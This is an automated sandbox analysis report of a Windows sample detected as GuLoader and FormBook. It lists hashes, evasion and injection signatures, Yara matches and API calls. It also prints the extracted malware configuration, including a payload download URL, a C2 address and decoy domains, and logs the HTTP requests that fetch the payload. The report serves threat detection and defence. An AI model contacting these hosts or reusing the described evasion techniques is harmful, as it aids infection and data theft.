Windows Analysis Report ZGNX11JMSc.exe

Overview

General Information

Sample Name: ZGNX11JMSc.exe
Analysis ID: 448876
MD5: fcfb0ec70f1419ede8a534cc95cb61e9
SHA1: d3b529d77f1de00d63a75b3956d4bcf6bbce30ca
SHA256: ff1b034c7060724133c6df0aa8cf5411ec0e6775d3aca83a127617340a8c588a
Tags: 32exeGuLoadertrojan
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: ZGNX11JMSc.exe Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
Multi AV Scanner detection for submitted file
Source: ZGNX11JMSc.exe Virustotal: Detection: 20% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

Compliance:

barindex
Uses 32bit PE files
Source: ZGNX11JMSc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor URLs: http://ceattire.com/bin_UYDMbHwI28.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERIR SERVERIR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_UYDMbHwI28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ceattire.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bin_UYDMbHwI28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ceattire.comCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ceattire.com
Source: ZGNX11JMSc.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ZGNX11JMSc.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/
Source: ZGNX11JMSc.exe, 00000024.00000003.1040714283.0000000000A36000.00000004.00000001.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.bin
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binI
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/bin_UYDMbHwI28.binK
Source: ZGNX11JMSc.exe, 00000024.00000002.1042870245.0000000000A21000.00000004.00000020.sdmp String found in binary or memory: http://ceattire.com/o
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ZGNX11JMSc.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ZGNX11JMSc.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: ZGNX11JMSc.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: ZGNX11JMSc.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: ZGNX11JMSc.exe String found in binary or memory: https://www.digicert.com/CPS0

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC NtWriteVirtualMemory, 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224879F NtProtectVirtualMemory, 1_2_0224879F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248C82 NtSetInformationThread, 1_2_02248C82
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022454E5 NtAllocateVirtualMemory, 1_2_022454E5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD NtWriteVirtualMemory, 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A NtWriteVirtualMemory, 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F NtWriteVirtualMemory, 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244B8E NtWriteVirtualMemory, 1_2_02244B8E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 NtWriteVirtualMemory, 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 NtWriteVirtualMemory, 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 NtWriteVirtualMemory, 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 NtWriteVirtualMemory, 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C NtWriteVirtualMemory, 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244785 NtWriteVirtualMemory, 1_2_02244785
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B NtWriteVirtualMemory, 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248CD5 NtSetInformationThread, 1_2_02248CD5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E NtWriteVirtualMemory, 1_2_0224251E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248D58 NtSetInformationThread, 1_2_02248D58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022455AC NtAllocateVirtualMemory, 1_2_022455AC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk, 36_2_1E189A00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A20 NtResumeThread,LdrInitializeThunk, 36_2_1E189A20
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A50 NtCreateFile,LdrInitializeThunk, 36_2_1E189A50
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk, 36_2_1E189660
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk, 36_2_1E1896E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189710 NtQueryInformationToken,LdrInitializeThunk, 36_2_1E189710
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189780 NtMapViewOfSection,LdrInitializeThunk, 36_2_1E189780
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk, 36_2_1E1897A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189840 NtDelayExecution,LdrInitializeThunk, 36_2_1E189840
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk, 36_2_1E189860
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk, 36_2_1E1898F0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk, 36_2_1E189910
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189540 NtReadFile,LdrInitializeThunk, 36_2_1E189540
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1899A0 NtCreateSection,LdrInitializeThunk, 36_2_1E1899A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1895D0 NtClose,LdrInitializeThunk, 36_2_1E1895D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189610 NtEnumerateValueKey, 36_2_1E189610
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A10 NtQuerySection, 36_2_1E189A10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189650 NtQueryValueKey, 36_2_1E189650
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189670 NtQueryInformationProcess, 36_2_1E189670
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189A80 NtOpenDirectoryObject, 36_2_1E189A80
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1896D0 NtCreateKey, 36_2_1E1896D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A710 NtOpenProcessToken, 36_2_1E18A710
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189B00 NtSetValueKey, 36_2_1E189B00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189730 NtQueryVirtualMemory, 36_2_1E189730
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189770 NtSetInformationFile, 36_2_1E189770
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A770 NtOpenThread, 36_2_1E18A770
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189760 NtOpenProcess, 36_2_1E189760
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18A3B0 NtGetContextThread, 36_2_1E18A3B0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189FE0 NtCreateMutant, 36_2_1E189FE0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189820 NtEnumerateKey, 36_2_1E189820
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18B040 NtSuspendThread, 36_2_1E18B040
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1898A0 NtWriteVirtualMemory, 36_2_1E1898A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18AD30 NtSetContextThread, 36_2_1E18AD30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189520 NtWaitForSingleObject, 36_2_1E189520
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189950 NtQueueApcThread, 36_2_1E189950
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E189560 NtWriteFile, 36_2_1E189560
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1899D0 NtCreateProcessEx, 36_2_1E1899D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1895F0 NtQueryInformationFile, 36_2_1E1895F0
Detected potential crypto function
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408FD 1_2_022408FD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022468CC 1_2_022468CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022458C9 1_2_022458C9
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248C82 1_2_02248C82
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022454E5 1_2_022454E5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022404CA 1_2_022404CA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022472C3 1_2_022472C3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022442CD 1_2_022442CD
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B2D 1_2_02241B2D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B1A 1_2_02241B1A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247B73 1_2_02247B73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241B5F 1_2_02241B5F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248385 1_2_02248385
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244B8E 1_2_02244B8E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243B9A 1_2_02243B9A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022443F1 1_2_022443F1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247036 1_2_02247036
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224100E 1_2_0224100E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224881D 1_2_0224881D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244071 1_2_02244071
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240845 1_2_02240845
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408B3 1_2_022408B3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022408E2 1_2_022408E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022420E3 1_2_022420E3
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022458F8 1_2_022458F8
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022480D4 1_2_022480D4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224790A 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247153 1_2_02247153
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242958 1_2_02242958
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022429B0 1_2_022429B0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022451BE 1_2_022451BE
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242183 1_2_02242183
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02241E2C 1_2_02241E2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240610 1_2_02240610
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224767B 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243E5E 1_2_02243E5E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022476B2 1_2_022476B2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243EC4 1_2_02243EC4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247F03 1_2_02247F03
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243F0C 1_2_02243F0C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247F6D 1_2_02247F6D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240FB5 1_2_02240FB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02244785 1_2_02244785
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240C24 1_2_02240C24
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224341B 1_2_0224341B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248446 1_2_02248446
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243C4E 1_2_02243C4E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02243CF0 1_2_02243CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_022434C4 1_2_022434C4
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248CD5 1_2_02248CD5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224350F 1_2_0224350F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0224251E 1_2_0224251E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02247D52 1_2_02247D52
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02248D58 1_2_02248D58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240D83 1_2_02240D83
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02240D9C 1_2_02240D9C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02245DCA 1_2_02245DCA
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E166E30 36_2_1E166E30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17EBB0 36_2_1E17EBB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15841F 36_2_1E15841F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201002 36_2_1E201002
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B090 36_2_1E15B090
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14F900 36_2_1E14F900
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E140D20 36_2_1E140D20
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E211D55 36_2_1E211D55
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 36_2_1E15D5E0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: String function: 1E14B150 appears 32 times
PE / OLE file has an invalid certificate
Source: ZGNX11JMSc.exe Static PE information: invalid certificate
PE file contains strange resources
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ZGNX11JMSc.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: ZGNX11JMSc.exe, 00000001.00000000.213248229.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1048619295.000000001E3CF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000002.1042709063.00000000009A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe, 00000024.00000000.621492297.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Source: ZGNX11JMSc.exe Binary or memory string: OriginalFilenameANTISOCIA.exe vs ZGNX11JMSc.exe
Uses 32bit PE files
Source: ZGNX11JMSc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@6/1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File created: C:\Users\user\AppData\Local\Temp\~DFF8A59228C9DEEDCA.TMP Jump to behavior
Source: ZGNX11JMSc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: ZGNX11JMSc.exe Virustotal: Detection: 20%
Source: unknown Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe' Jump to behavior
Source: ZGNX11JMSc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.623756181.0000000002240000.00000040.00000001.sdmp, type: MEMORY
Yara detected GuLoader
Source: Yara match File source: ZGNX11JMSc.exe, type: SAMPLE
Source: Yara match File source: 1.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000000.621430446.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.213217103.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.623260641.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_0040495E push es; ret 1_2_00404963
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02061774 push edx; ret 1_2_020617A1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02064205 push edx; ret 1_2_02064231
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02062A05 push edx; ret 1_2_02062A31
